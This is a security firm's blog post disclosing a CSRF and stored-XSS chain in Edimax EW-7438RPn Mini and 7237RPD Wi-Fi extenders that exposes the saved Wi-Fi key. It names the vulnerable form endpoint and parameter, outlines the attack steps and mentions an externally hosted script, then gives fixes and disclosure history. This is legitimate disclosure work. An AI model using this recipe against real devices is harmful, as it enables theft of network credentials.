Blog: Internet Of Things

Edimax Wi-Fi Extender can disclose your WPA key

Ken Munro 06 Jan 2017

We found two weaknesses in the Edimax Wi-Fi Extender EW-7438RPn Mini and 7237RPD, which when combined, can lead to disclosure of the user’s PSK if we can entice them into visiting a web page under our control, and if they have asked the browser to store their credentials for automatic replay. (The Wi-Fi extenders use basic authentication).

The attack works as follows:

  • Create CSRF attacks for each local IP on the subnet.
  • The CSRF writes a stored XSS attack into the web interface of the device
  • The XSS allows us to bypass the Same Origin policy of the browser
  • Therefore, we can read the PSK from the device’s web interface and display it.

A variant was also carried out using XHR to update the device’s firmware, which also seemed to be possible.

First we create the first page, which checks the local IP of the browser and then generates the later CSRF for all nodes on the local network. We’ve talked about this before.

In the two devices, we use CSRF to set the GpskValue (guest PSK) to:

…this requires a POST to /goform/formwlencryptvxd

The eventual JS payload at http://xjsi.io is simply this:

This is running on Google Chrome, where the username/password for the Edimax device have been saved.

Figure 1 – One of the many individual CSRF attacks hits the Wi-Fi extender and causes the pop up showing the PSK.

Instead of doing an alert pop up, we could easily export the PSK using an XML HTTP Request at this point.

Fixes manufacturers need to make:

CSRF – Either use anti-CSRF tokens, or check the Referrer header to make sure that the request is genuinely initiated by the user.

XSS – always HTML-encode the user supplied data before it is written to screen. This means both the wireless site survey in terms of SSIDs (reported previously), and other data entered by the user, such as the guest SSID and passphrase.

Ideally, do not display the PSK to the user at all – it should be possible to reset passwords but they should not be displayed in the web interface.

Lastly, make it easy on yourself and your users and make the device auto-download and install cryptographically signed updates.

Edimax were informed on 29th August 2016, and are/might be working on updated firmware. I’ve asked how they are getting on, but have had no response.

What you the user can do:

For now, if you need to protect yourself, change the password on the web interface and do not store it within the browser – this will stop the attack from working, and is good advice in general for all embedded devices in your home.

While you’re at it, why not check for updates on the other bits and pieces you own?